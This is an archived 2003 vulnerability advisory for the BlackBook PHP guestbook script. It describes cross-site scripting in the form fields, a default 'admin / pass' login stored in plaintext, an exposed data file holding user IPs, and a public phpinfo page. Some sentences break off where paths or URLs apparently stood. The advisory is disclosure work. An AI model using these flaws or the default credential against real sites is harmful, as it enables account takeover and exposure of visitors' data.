Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: PHP :: bt617.txt

BlackBook - Multiple Vunerabilities

          - EXPL-A-2003-015 Advisory 015
                                -= BlackBook =-

Donnie Werner
July 11, 2003

1. XSS executes JS in PHP remotely
2. Default and plaintext password
3. File premission issues
4. phpinfo.php

EJ3 BlackBook v1.0 - S.10-VIII-2002

Description of product:
"BlackBook is a complete guestbook script with tons of features
that don't need MySQL to work. Search, compare & if you find
a guestbook better that BlackBook, use it!! Author: Emilio José

Webspace with PHP4 support.
TOPo have been developed over a Apache v1.3 + PHP v4.0.6
platform running in Windows 98 SE and have been fully tested in
Internet Explorer v5.5"

ummm.. ok  hint: it runs on most anything with php installed

Another very popular "guestbook" type of php script with many flaws...

1. XSS Vunerabilities lay in almost every field EXCEPT the message
as a note HTML is defined as "off" by default in sign.php


the JS code is rendered / executed in the the users browser upon
trivial visit to

2. Default user / password is "admin / pass" and stored plaintext in

3. posts are stored in /blackbook/data/data.dat which is not protected
by default
information includes user / ip info and message info. the setup
appears to set
this perm, but it does not. setting up on a NT box completly makes the
user belive
it is setting perms 666, 777 etc.. ( umm.. this aint your fathers
*nix )

4. phpinfo.php ,  lets help remote enumeration some huh?

yes, cleartext in config.php

yup we got XSS and stuff via remote

Vendor Fix:
There is no fix on 0day

Vendor Contact:
Concurrent with this advisory


Donnie Werner

Original advisory may be found at

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH